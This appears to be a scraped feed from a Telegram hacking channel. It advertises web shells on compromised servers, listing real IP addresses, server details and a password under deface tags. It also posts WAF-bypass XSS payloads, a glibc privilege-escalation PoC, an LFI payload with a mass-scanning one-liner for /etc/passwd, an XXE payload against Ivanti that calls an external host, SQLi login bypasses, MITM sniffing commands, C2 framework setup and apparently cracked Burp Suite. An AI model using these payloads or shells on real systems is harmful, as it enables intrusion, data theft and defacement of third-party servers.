PHP: 7.0.33
Safe Mode: OFF
ServerIP: 208.109.13.219 [🇸🇬]
HDD: Total:149.99 GB
Free:28.53 GB [19%]
Useful : gcc cc ld make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
pwd: bugcod3
Enjoy... ⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Country:
#Deface
PHP: 8.2.15
Safe Mode: OFF
ServerIP: 50.116.94.196 [🇺🇸]
Domains: 428 domains
HDD: Total:393.53 GB
Free:21.53 GB [5%]
Useful : make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
Akamai WAF
Vector PoC
<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>
#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog
POC :
(exec -a "
printf '%0128000x' 1
" /usr/bin/su < /dev/null)
#Cve #Poc
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag
javascript:var{a:onerror}={a:alert};throw%20document.domain
#xss #Bypass #WAF
[+] Filter bypass techniques:
Sometimes you can do amazing things just by appending /? to bypass access control restrictions
POC:
https://targetdomain/api/endpoint <-- Access Denied
https://targetdomain/api/endpoint/? <--- Access to entire customer database
#AEMSecurity #FilterBypass #bugbountytips
Another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.
Payload ' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay
#VPD #BugBounty #security
PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.
cd PacketSpy
pip install -r requirements.txt
python3 packetspy.py --help
#Device Detection
python3 packetspy.py -tf 10.0.2.0/24 -i eth0
#Man-in-the-Middle Sniffing
python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
LearnExploit
#Python #Network #Packet #Sniffing #Tools
Country:
#Deface
PHP: 8.1.27
Safe Mode: OFF
ServerIP: 213.158.95.90 [🇮🇹 ]
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
🔗 Link
Enjoy...⭐️
#Shell
CloudFlare Bypass
<Img Src=OnXSS OnError=alert(1)>
#Bypass #XSS
LFI Payload⚡️
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
#LFI #Payload
Sick Finding 🥵⚡️
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000 -nc -path ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" -mr "root:x" | tee -a p1s.txt
#tip
CVE-2024-22024 - XXE on Ivanti Connect Secure
payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>
⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.
cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh
#Hacktoberfest #C2 #Redteam #Infrastructure
cloudflare WAF bypass XSS
any payload they blocked by cloudflare
this payload working
"><img src=x onerrora=confirm() onerror=confirm(1)>
#Cloudflare #Bugbounty #Tip
burpsuite_pro_v2024.zip
692.2 MB
Burp Suite Version 2024 🔻
❌ Note: you will need Java version 18 or higher to run it. ✔️
#burpsuite
Cloudflare WAF Bypass Leads to Reflected XSS ®️
Payload Used : "><img src=x onerror=alert(1)> [Blocked By Cloudflare]
Payload Used : "><img src=x onerrora=confirm() onerror=confirm(1)> [XSS Popup]
#WAF #Bypass #XSS